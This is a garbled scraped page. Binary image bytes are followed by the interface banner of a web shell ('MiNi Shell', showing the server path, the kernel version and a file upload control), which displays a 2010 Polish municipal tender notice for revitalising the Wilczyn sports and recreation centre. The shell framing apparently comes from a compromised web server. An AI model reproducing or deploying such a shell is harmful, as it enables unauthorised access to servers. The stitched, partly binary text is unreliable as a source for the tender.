JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100518/134814-N-2010.html

<p class="kh_header"><b>Wilczyn: Rewitalizacja terenu Gminnego Ośrodka Sportu i Rekreacji w Wilczynie</b><br>
<b>Numer ogłoszenia: 134814 - 2010; data zamieszczenia: 18.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilczyn , ul. Strzelińska 12D, 62-550 Wilczyn, woj. wielkopolskie, tel. 63 26 83 032, faks 63 26 85 045.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wilczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja terenu Gminnego Ośrodka Sportu i Rekreacji w Wilczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rewitalizacja terenu Gminnego Ośrodka Sportu i Rekreacji w Wilczynie, która polegała będzie na:

1)Plaża i kąpielisko
Utwardzenie powierzchni drogi
- mechaniczne rozebranie powierzchni asfaltowych grubości od 3-5 cm - 2407 m2,
- mechaniczne wykonanie koryta do 20 cm - 2853,75m2,
- profilowanie i zagęszczenie podłoża - 2853,75m2,
- wykonanie podbudowy z kruszywa łamanego grubości 15 cm - 2853,75m2,
- wykonanie obrzeży betonowych o wymiarach 30x8 cm ( kolor ) - 1337 m,
- wykonanie nawierzchni z kostki betonowej grubości 8 cm na podsypce cementowo-piaskowej 1:4 - 2853,75m2
w tym:
- droga i dróżki na polu biwakowym - 2781,75 m2,
- plac pod wiatę na rowery - 40 m2,
- plac pod szafki depozytowe - 12 m2,
- plac przy toalecie - 18 m2,
- plac pod infokiosk - 2 m2,
STAROBRUK - odmiana 6, 9, 12 oraz Koło grubości 8 cm w barwach jesieni, ułożone we wzory ( załącznik graficzny - przykład ),
NOWA GRANIT - kolor grubości 8 cm Trapez o wymiarach 5,3/6,3x8, 6,3x7,3x8, 7,3/8,3x8, 8,3/9,3x8, 9,3/10,3x8 ułożone we wzory ( załącznik graficzny - przykład ).
Istniejące włazy studni kanalizacyjnych i telefonicznych oraz skrzynki sieci wodociągowej dopasować do nowej nawierzchni.
Ławki, kosze
- montaż nowych ławek żeliwno-stalowych z siedzeniem i oparciem drewnianym długość 185 cm waga 60 kg z zamocowaniem do podłoża na beton - 39 szt.,
- montaż nowych koszy na słupku żeliwno-stalowym z koszem drewnianym, wysokości 100 cm waga 20 kg z kotwą do zabezpieczenia w gruncie, drewno iglaste - 16 szt.
Lampy na terenie ośrodka
- przebudowa napowietrznej linii energetycznej - w załączeniu przedmiar robót,
- demontaż istniejących lamp w ilości 15 szt.,
- montaż nowych lamp w ilości 15 szt. ( załącznik graficzny - przykład ).
Przebieralnie
- ustawienie sezonowej przebieralni D/M - 2 szt. ( jednorazowo 4+4 miejsc, wykonane z paneli z tworzyw sztucznych poliestrowych ).
Kontener WC
- kontener sanitarny ( wc ) D/M dla pań, panów i osób niepełnosprawnych oraz z miejscem do przewijania dzieci ( załącznik graficzny ) - 1 kpl.
oraz :
- podłączenie do istniejącej sieci wodociągowej - 10 m,
- podłączenie do istniejącej studni kanalizacji sanitarnej - 10 m,
- podłączenie energetyczne ze skrzynki - 12 m.
Przystań
- wykonanie przystani dla sprzętu pływającego typu MARINA na 25 jednostek pływających ( dostawa i montaż ) - 1 szt. ( wykonane na podstawie analogi do istniejącego pomostu i załączonego rysunku ).
Pomost
- wykonanie pomostu pływającego o wymiarach 50x3 m - 1 szt. ( jak istniejący ) w załączeniu projekt budowlany istniejącego pomostu.
Rekultywacja plaży
- roboty ziemne związane z plantowaniem plaży ( przekopy i plantowanie ) - 4500 m2
- dowóz i rozplantowanie piasku na plaży, warstwa około 15 cm - 675 m3
Piasek powinien być drobny, płukany o frakcji 0,1 -0,25 mm. 
Kort tenisowy
- rozebranie istniejącego ogrodzenia - 354 m2
- wykonanie nowego ogrodzenia o wysokości 3,5 m z siatki na słupkach stalowych obsadzonych w gruncie i obetonowanych - 206,50 m
Scena
- zakup i montaż sceny z zadaszeniem ( estrady ) - 1 szt. (załącznik graficzny - przykład )
Scena przenośna wykonana na bazie lekkich profili aluminiowych o powierzchni 48 m2, zadaszenie oparte na słupach z podporami o wysokości 6,0 m wykonane z trudno zapalnego materiału plandekowego. Wózki na słupach podnoszone za pomocą wciągarek łańcuchowych.
Tablica informacyjna
- zakup i montaż tablicy informacyjnej typu średniego ze wskazaniami temperatury powietrza i wody, daty i godziny oraz dodatkowego wyświetlacza - 1 kpl. (załącznik graficzny - przykład) montowana na plaży w odległości 30 m od wypożyczalni sprzętu, zasilanie z istniejącej skrzynki energetycznej
Cyfry o wysokości 15 cm, wymiary zewnętrzne wyświetlacza 170x30 z super jasnymi diodami, sterowanie z sieci Ethernet,
Wyposażenie
- ustawienie wiaty na 30 szt. rowerów - 1 szt. (załącznik graficzny - przykład )
- szafki depozytowe dla turystów - stalowe, malowane proszkowo, o głębokości 50 cm z zamkiem na monetę - 48 miejsc (załącznik graficzny - przykład ) oraz wykonanie lekkiego zadaszenia nad szafkami
- zjeżdżalnia sucha dla dzieci wysokość 9 m, szerokość 8 m, długość 12,5 m, pneumatyczna z oprzyrządowaniem - 1 szt. (załącznik graficzny - przykład )

2)Budowa Placu Zabaw
- wykonanie placu zabaw - dostawa i montaż zestawów ruchowo-rekreacyjnych oraz pozostałych elementów wyposażenia według istniejącego projektu zagospodarowania terenu placu zabaw ( projekt w załączeniu) w tym:
- wykonanie powierzchni terenów zielonych - trawniki - 358 m2
- wykonanie zieleni wysokiej
-krzewy iglaste - odmiany cyprys, cyprysik, jałowiec - wysokość 80 cm - 24 szt.
-drzewa liściaste - odmiany lipa, jarzębina, klon - wysokość 2,0 m - 43 szt.
- wykonanie nawierzchni piaskowej grubości 15 cm na placu zabaw - 930 m2
- wykonanie ogrodzenia - 158 mb (segmenty konstrukcji drewnianej o wys. 80-100 cm na słupkach metalowych malowanych proszkowo posadowionych w gruncie na zaprawie betonowej)
- montaż nowych ławek żeliwno-stalowych z siedzeniem i oparciem drewnianym długość 185 cm waga 60 kg z zamocowaniem do podłoża na beton - 12 szt.
- montaż nowych koszy na słupku żeliwno-stalowym z koszem drewnianym, wysokości 100 cm waga 20 kg z kotwą do zabezpieczenia w gruncie, drewno iglaste - 4 szt.
- bramka wejściowa - 1 szt.
- tablica informacyjna - 1 szt. (zawierająca informacje na temat ogólnych warunków użytkowania i korzystania z placu zabaw)
- wykonanie altany z drewna o powierzchni około 16 m2 - 1 szt. (załącznik graficzny - przykład )

3)Remont kempingu
Ogrodzenie
- wykonanie ogrodzenia z siatki wysokości 2,0 m na słupkach stalowych o średnicy 76 mm i rozstawie 2,1 m, obsadzenie w gruncie i obetonowanie - 329,5m
- wymiana częściowa siatki o wys. 1,0 m na polach biwakowych ( 50%) oraz malowanie - 258,5 m
Kuchnia turystyczna
- licowanie ścian płytkami 30x30 cm na przygotowanym podłożu - 56,43 m2
- posadzki z płytek 30x30 cm na zaprawie klejowej - 55,68 m2
- wymiana baterii zmywakowych o średnicy 15 mm - 2 kpl.
- wymiana zlewów - 2 szt.
- wymiana kratek ściekowych o średnicy 50 mm - 3 szt.
- wymiana starych rynien na rynny z blachy ocynkowanej półokrągłe średnicy 15cm- 25,2 m
- wymiana rynien spustowych na rynny z blachy ocynkowanej średnicy 12 cm -7,5 m
- demontaż ekranu dachowego wraz ze wspornikami - 46 m
- pokrycie dachu papą termozgrzewalną - 80,64 m2
- poszerzenie podestu betonowego - 5,2 m3
- posadzki z kamienia sztucznego 30x30 cm na zaprawie klejowej (taras) - 220,10 m2
- malowanie powierzchni z przygotowaniem podłoża farbami emulsyjnymi - 149,13 m2
- malowanie okien i świetlików - 34,02 m2
- zamontowanie kolektorów słonecznych na dachu kuchni do podgrzewania ciepłej wody 
- 3 szt. Kolektory o powierzchni 3 m2 na 1 szt. wraz z oprzyrządowaniem zamontowane na dachu kuchni turystycznej.
Punkt informacyjny
- zakup, montaż i instalacja infokiosku - 1 szt. (załącznik graficzny), połączenie i zasilanie z recepcji na ośrodku.
Terminal wykonany z aluminium malowanego proszkowo, konstrukcja odporna na zniszczenie - zalanie płynem, silne słońce oraz wandaloodporna, wbudowany komputer PC z systemem operacyjnym oraz specjalnym oprogramowaniem dla kiosków internetowych na bazie systemu Windows XP.
Parametry wbudowanego komputera :
- procesor minimum 2 GHz
- RAM minimum 1024 MB
- dysk minimum HDD 160 GB 7200 rmp
- napęd DVD
- wyświetlacz LCD minimum 17
- karta graficzna i karta sieciowa zintegrowana

4)Remont parkingu
Utwardzenie powierzchni parkingu
- rozebranie nawierzchni z płyt wielootworowych oraz krawężników - 825 m2
- wywóz gruzu z rozbiórki - 123,75 m3
- mechaniczne wykonanie koryta o głębokości do 20 cm - 1680 m2
- wykonanie podbudowy z kruszywa łamanego grubości 15 cm - 1680 m2
- wykonanie obrzeży betonowych o wymiarach 30x8 cm ( kolor ) - 408 m
- wykonanie nawierzchni z kostki betonowej grubości 8 cm na podsypce cementowo-piaskowej 1:4 - 1680 m2
STAROBRUK - odmiana 6, 9, 12 oraz Koło grubości 8 cm w barwach jesieni, ułożone we wzory ( załącznik graficzny - przykład )
NOWA GRANIT - kolor grubości 8 cm Trapez o wymiarach 5,3/6,3x8, 6,3x7,3x8, 7,3/8,3x8, 8,3/9,3x8, 9,3/10,3x8 ułożone we wzory ( załącznik graficzny )
Ogrodzenie
- rozebranie istniejącego ogrodzenia - 502,25 m2
- wykonanie ogrodzenia z siatki wysokości 2,0 m na słupkach stalowych o średnicy 76 mm i rozstawie 2,1 m, obsadzenie w gruncie i obetonowanie - 287,0 m
- montaż bram metalowych rozsuwanych o szerokości 5,0 m - 1 kpl.
Lampy na terenie parkingu
- demontaż istniejących lamp w ilości 5 szt.
- montaż nowych lamp w ilości 5 szt. ( załącznik graficzny - przykład )

5)Zagospodarowanie terenu domków turystycznych
Utwardzenie powierzchni dróg wewnętrznych i tarasów
- mechaniczne wykonanie koryta o głębokości do 20 cm - 1202 m2
- wykonanie podbudowy z kruszywa łamanego grubości 15 cm - 1202 m2
- wykonanie obrzeży betonowych o wymiarach 30x8 cm ( kolor ) - 366 m
- wykonanie nawierzchni z kostki betonowej grubości 8 cm na podsypce cementowo-piaskowej 1:4 - 1202 m2
STAROBRUK - odmiana 6, 9, 12 oraz Koło grubości 8 cm w barwach jesieni, ułożone we wzory ( załącznik graficzny - przykład )
NOWA GRANIT - kolor grubości 8 cm Trapez o wymiarach 5,3/6,3x8, 6,3x7,3x8, 7,3/8,3x8, 8,3/9,3x8, 9,3/10,3x8 ułożone we wzory ( załącznik graficzny )
Ogrodzenie
- wykonanie ogrodzenia z siatki wysokości 2,0 m na słupkach stalowych o średnicy 76 mm i rozstawie 2,1 m, obsadzenie w gruncie i obetonowanie - 133,0 m
- montaż bram metalowych rozsuwanych o szerokości 5,0 m - 1 kpl.
Lampy na terenie domków
- demontaż istniejących lamp w ilości 5 szt.
- montaż nowych lamp w ilości 5 szt. ( załącznik graficzny - przykład )
Ławki, kosze
- montaż nowych ławek żeliwno-stalowych z siedzeniem i oparciem drewnianym długość 185 cm waga 60 kg z zamocowaniem do podłoża na beton - 11 szt.
- montaż nowych koszy na słupku żeliwno-stalowym z koszem drewnianym, wysokości 100 cm waga 20 kg z kotwą do zabezpieczenia w gruncie, drewno iglaste - 4 szt.
Doposażenie bazy noclegowej
- stoły i ławy drewniane - 11 szt. (piknikowe wykonane z profili zamkniętych stalowych malowanych proszkowo o pow. blatu 200x100 może być wykonany z desek nieobrobionych na bokach, z przytwierdzonymi na stałe po obu stronach stołu ławami drewnianymi z oparciem o tej samej konstrukcji, konstrukcja drewniana malowana lakierobejcą na kolor brązowy)
- grille stacjonarne betonowe, średniej wielkości - 11 szt. ( grille stacjonarne wykonane z uszlachetnionego betonu o wymiarach wys. 180-200 cm, palenisko 60-70x40-45, ruszt grilla wykonany ze stali nierdzewnej, grill wyposażony w blat roboczy, powinien posiadać akcesoria ze stali nierdzewnej z uchwytami drewnianymi w komplecie walizkowym).
Wykonanie zieleni wysokiej
-krzewy iglaste - odmiany cyprys, cyprysik, jałowiec - wysokość 80 cm - 11 szt.
-drzewa liściaste - odmiany lipa, jarzębina, klon - wysokość 2,0 m - 11 szt.
Donice ( Kwiatony )
- wykonane z betonu zbrojonego, powierzchnia - kamyk rzeczny, płukany , wysokość 30 cm, szerokość 40 cm, długość 80 cm, waga około 60 kg - 44 szt. (załącznik graficzny - przykład)

Wyposażenie objęte projektem przed zakupem musi zostać zaakceptowane przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.10-0, 45.11.12.91-4, 45.11.12.00-0, 45.23.32.23-8, 45.23.32.22-1, 37.53.52.00-9, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium.
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10.000,00, słownie: dziesięć tysięcy złotych.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy: 
Bank Spółdzielczy w Koninie O/Wilczyn   Nr 64 8530 0000 0300 0260 2000 0006 z adnotacją - wadium - Rewitalizacja terenu GOSiR-u w Wilczynie 
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) 
w terminie do 2010-06-07, sposób przekazania: Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w kasie Urzędu Gminy, biuro 12, a kserokopię potwierdzoną za zgodność kopii z oryginałem dołączyć do oferty.	
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że zrealizował, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 roboty budowlanej z zakresu zagospodarowania lub urządzania terenów plaż, parków lub innych terenów rekreacyjnych o wartości nie mniejszej niż 1 milion złotych brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (protokoły z odbioru robót, referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone, tj:
a) jedną osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia:
- w branży konstrukcyjno - budowlanej - uprawnienia budowlane bez ograniczeń w specjalności konstrukcji stalowych lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osoby zdolnej do wykonania zamówienia oraz aktualne na dzień składania oferty zaświadczenie o przynależności do właściwej izby samorządu zawodowego, wymaganymi przepisami prawa budowlanego i ustawy o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (kierownik budowy musi być wpisany na listę Okręgowej Izby Inżynierów Budownictwa (Dz. U. z 2001r. Nr 5, poz. 42 z późn. zm.),
b) jedną osobą, która będzie pełnić funkcję kierownika robót posiadającą uprawnienia:
- w branży elektrycznej - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osoby zdolnej do wykonania zamówienia oraz aktualne na dzień składania oferty zaświadczenie o przynależności do właściwej izby samorządu zawodowego, wymaganymi przepisami prawa budowlanego i ustawy o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w banku lub spółdzielczej kasie oszczędnościowo - kredytowej, w której Wykonawca posiada rachunek w kwocie odpowiadającej co najmniej połowie wysokości całkowitej ceny za wykonanie przedmiotu zamówienia, podanej w swojej ofercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

